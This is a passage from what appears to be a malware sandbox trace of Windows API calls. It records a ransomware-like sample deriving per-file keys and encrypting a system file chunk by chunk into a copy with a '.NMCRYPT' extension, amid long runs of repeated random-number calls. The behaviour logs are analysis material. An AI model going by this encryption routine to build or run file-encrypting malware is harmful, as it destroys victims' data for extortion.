out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.186] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.186] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.187] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0159.187] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.187] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad378) returned 1 [0159.187] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.187] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.187] wcslen (_String="\\\\?\\") returned 0x4 [0159.187] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad1f8) returned 1 [0159.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.188] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.188] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.188] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.190] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.190] GetLastError () returned 0x0 [0159.190] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.195] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.196] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.196] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.196] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.196] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.196] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.196] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.196] GetLastError () returned 0x0 [0159.196] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.197] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.197] GetLastError () returned 0x0 [0159.197] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.197] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.198] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.198] GetLastError () returned 0x0 [0159.198] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.199] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.199] GetLastError () returned 0x0 [0159.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 